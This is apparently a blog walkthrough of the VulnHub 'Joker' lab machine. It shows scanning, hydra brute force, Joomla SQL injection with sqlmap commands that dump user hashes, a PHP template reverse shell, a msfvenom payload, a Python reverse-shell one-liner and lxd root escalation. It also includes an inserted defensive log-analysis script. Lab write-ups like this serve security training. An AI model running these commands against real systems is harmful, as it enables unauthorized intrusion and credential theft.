joker vulnhub

Mohamed Ayad
2 min read, Nov 28, 2019


first we do our nmap scan
1- nmap -sC -Pn -p- 192.168.133.144
we got this output:

if we open 192.168.133.144 in our browser we find just pictures, nothing interesting
2- dirb http://192.168.133.144
we got this output:

in the /img directory we can download all the images with this simple bash loop
for img in {1..18}; do wget http://192.168.133.144/img/$img.png; done
but unfortunately, again, we didn't find anything interesting

so let's try our second port, 8080; we noticed earlier that it uses basic auth
so we can use either metasploit, hydra or burpsuite
3- hydra -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 192.168.133.144 http-get (the username joker is just a guess xd)
result:

fantastic, we got user joker and password hannah; let's move on
we can type this link in the browser
http://joker:hannah@192.168.133.144:8080
let's run dirb again
dirb http://joker:hannah@192.168.133.144:8080

ok, through browsing the site we realized that it's a Joomla web app, so we will use joomscan
joomscan --url http://joker:hannah@192.168.133.144:8080
we got that its version is 3.7, which is vulnerable to SQL injection
we can also use joomlavs
ruby joomlavs.rb -u http://192.168.133.144:8080 --basic-auth joker:hannah -a
after searching we found this exploit: https://www.exploit-db.com/exploits/42033

URL Vulnerable: http://192.168.133.144:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using sqlmap:

sqlmap -u "http://192.168.133.144:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p 'list[fullordering]' --auth-type=BASIC --auth-cred=joker:hannah

sqlmap -u "http://192.168.133.144:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p 'list[fullordering]' --auth-type=BASIC --auth-cred=joker:hannah

sqlmap -u "http://192.168.133.144:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p 'list[fullordering]' --auth-type=BASIC --auth-cred=joker:hannah

sqlmap -u "http://192.168.133.144:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C id,email,name,password --dump -p 'list[fullordering]' --auth-type=BASIC --auth-cred=joker:hannah

we could use john with the rockyou wordlist, but it would take a lot of time, so just as a guess: the user is the Joomla default and the password is the same
username: joomla, pass: joomla, and we enter them at /administrator
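As an added defender-side example (not part of the original write-up), the following Python script scans constructed Apache access-log lines for the two noisy steps above: the hydra password guessing against the port 8080 basic auth (a burst of 401s from one source) and the exploit-db 42033 injection, whose list[fullordering] value is not a plain "column ASC|DESC" ordering. The sample log lines, the 401 threshold and the ordering pattern are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlparse, parse_qs

# Apache combined-log prefix: client, ident, user, timestamp, request, status, size.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+')

# A legitimate com_fields ordering value looks like "a.id DESC"; the injection
# from exploit-db 42033 puts quotes/SQL functions into the same parameter.
ORDERING_OK = re.compile(r'^[a-z_.]+ (ASC|DESC)$', re.IGNORECASE)
SQLI_HINT = re.compile(r'''updatexml|extractvalue|['"()]''', re.IGNORECASE)

def is_com_fields_sqli(path: str) -> bool:
    """True when list[fullordering] on a com_fields request is not a plain ordering."""
    qs = parse_qs(urlparse(path).query)          # parse_qs URL-decodes keys and values
    if qs.get("option") != ["com_fields"]:
        return False
    return any(SQLI_HINT.search(v) or not ORDERING_OK.match(v)
               for v in qs.get("list[fullordering]", []))

def analyze(lines, auth_fail_threshold=5):
    """Return (set of IPs at/above the 401 threshold, list of SQLi request lines)."""
    failures = Counter()
    sqli = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["status"] == "401":                  # repeated 401s = basic-auth guessing
            failures[m["ip"]] += 1
        if is_com_fields_sqli(m["path"]):
            sqli.append(line)
    return {ip for ip, n in failures.items() if n >= auth_fail_threshold}, sqli

# Constructed sample log (assumed, not from the original post): six failed logins,
# one successful login, one injection attempt and one benign com_fields request.
SAMPLE_LOG = [
    f'192.168.133.143 - - [28/Nov/2019:10:00:0{i} +0000] "GET / HTTP/1.1" 401 381'
    for i in range(6)
] + [
    '192.168.133.143 - joker [28/Nov/2019:10:00:07 +0000] "GET / HTTP/1.1" 200 1523',
    '192.168.133.143 - joker [28/Nov/2019:10:05:00 +0000] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=updatexml%27 HTTP/1.1" 500 2210',
    '10.0.0.5 - joker [28/Nov/2019:10:06:00 +0000] "GET /index.php?option=com_fields'
    '&view=fields&layout=modal&list[fullordering]=a.id%20DESC HTTP/1.1" 200 9000',
]
brute_ips, sqli_hits = analyze(SAMPLE_LOG)       # quick run over the sample
```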

our next goal is to upload a shell, so since we are now admin let's move to the templates section
we create a PHP file which contains a reverse shell through nc
<?php
system('nc 192.168.133.143 5555 -e /bin/bash');
?>
when we open nc -lvp 5555, nothing happens
so we will use msfvenom to create our shell, upload it, then receive it through our metasploit handler
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.133.143 lport=7777 > m.php
cat it, copy the content, paste it into any file of the templates, and
msfconsole
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.133.143
set lport 7777
run
browse to http://192.168.133.144/templates/beez3/m.php
boom!!! session opened
we can get a reverse shell with this python one-liner
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.133.143",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
receiving it with ncat
then we spawn a pty to make our shell interactive
python3 -c 'import pty; pty.spawn("/bin/bash")'

id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
lxd is a container tool with a known CVE
https://www.exploit-db.com/exploits/46978
after following the exploit's instructions we need to move our file to the victim machine
python -m SimpleHTTPServer 8080 (on the attacker machine)
wget 192.168.133.143:8080/files
id
root
